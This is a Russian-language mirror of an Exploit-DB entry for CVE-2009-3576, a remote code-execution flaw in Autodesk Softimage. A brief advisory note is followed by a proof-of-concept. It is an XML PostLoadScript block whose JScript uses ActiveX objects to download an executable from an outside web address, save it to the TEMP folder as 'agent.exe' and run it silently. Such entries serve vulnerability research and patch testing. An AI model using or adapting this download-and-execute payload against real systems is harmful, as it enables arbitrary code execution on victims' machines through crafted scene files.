- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33273
- Проверка EDB
-
- Пройдено
- Автор
- DIEGO JUAREZ
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2009-3576
- Дата публикации
- 2009-11-23
Код:
source: https://www.securityfocus.com/bid/36637/info
Autodesk Softimage is prone to a remote code-execution vulnerability.
Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
<PostLoadScript>
<Language>JScript</Language>
<Function></Function>
<Script_Content>
<![cdata[
var s=new ActiveXObject('WScript.Shell');
var o=new ActiveXObject('ADODB.Stream');
var e=s.Environment('Process');
var u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
var b=e.Item('TEMP')+'agent.exe';
var x=new ActiveXObject('Microsoft.XMLHTTP');
//x=new ActiveXObject('MSXML2.ServerXMLHTTP');
if(!x)
exit(0);
x.open('GET',u,0);
x.send(null);
o.Type=1;
o.Mode=3;
o.Open();
o.Write(x.responseBody);
o.SaveToFile(b,2);
s.Run(b,0);
]] >
</Script_Content>
</PostLoadScript>
- Источник
- www.exploit-db.com